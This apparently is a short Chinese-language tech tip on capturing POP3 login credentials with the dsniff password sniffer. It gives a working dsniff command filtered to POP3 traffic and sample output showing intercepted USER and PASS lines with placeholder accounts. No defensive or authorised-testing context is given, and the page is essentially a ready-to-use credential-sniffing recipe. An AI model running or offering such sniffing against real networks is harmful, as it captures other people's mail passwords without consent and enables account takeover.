通过拦截用户命令嗅探POP3身份验证

・1 分钟阅读

通过拦截用户命令嗅探POP3身份验证

dsniff -i any 'tcp port pop3'
DSNIFF是一个通用的密码嗅探器,它处理许多不同的协议,但是,它也处理TCP风格的表达式来限制分析的流量-所以,我可以限制它只在POP3上工作,
示例输出
dsniff: listening on any [tcp port pop3]
-----------------
11/18/10 10:41:01 tcp xxx.48323 -> remote.host.110 (pop3)
USER user1
PASS pass-for-user1
-----------------
11/18/10 10:41:28 tcp xxx.48321 -> other.host.110 (pop3)
USER user2
PASS pass-for-user2
讨论
Hujiuxiang profile image